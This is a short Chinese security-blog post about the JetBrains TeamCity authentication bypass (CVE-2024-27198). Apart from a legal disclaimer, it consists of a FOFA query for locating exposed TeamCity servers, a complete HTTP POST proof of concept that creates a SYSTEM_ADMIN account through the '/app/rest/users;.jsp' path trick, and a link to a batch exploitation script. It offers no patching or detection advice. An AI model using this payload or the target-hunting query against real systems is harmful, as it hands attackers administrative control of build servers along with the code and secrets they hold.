JetBrains TeamCity 身份验证绕过漏洞(CVE-2024-27198)-附py
JetBrains TeamCity 身份验证绕过漏洞(CVE-2024-27198)-附py
Y1_K1NG Yi安全 2024-03-09 16:56
由于微信公众号推送机制改变了,快来星标不再迷路,谢谢大家!
免责声明
本文章仅用于信息安全防御技术分享,因用于其他用途而产生不良后果,作者不承担任何法律责任,请严格遵循中华人民共和国相关法律法规,禁止做一切违法犯罪行为。
文
章中敏感信息均
已做多层打马处理。
传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行
负责。
JetBrains TeamCity
一:漏洞描述
JetBrains TeamCity 身份验证绕过漏洞(CVE-2024-27198)
二:网络空间测绘查询
fofa
body="Log in to TeamCity"
## 三:漏洞复现
poc****
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: youip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate
{"username": "test123", "password": "test123", "email": "[email protected]","roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}
****## 四:批量脚本获取
https://github.com/Y1-K1NG/poc_exp/tree/main/20240309JetBrains%20TeamCity%20%E8%BA%AB%E4%BB%BD%E9%AA%8C%E8%AF%81%E7%BB%95%E8%BF%87%E6%BC%8F%E6%B4%9E(CVE-2024-27198)
由于传播、利用本公众号Yi安全所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号Yi安全及作者不为此
承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!
好文分享收藏赞一下最美点在看哦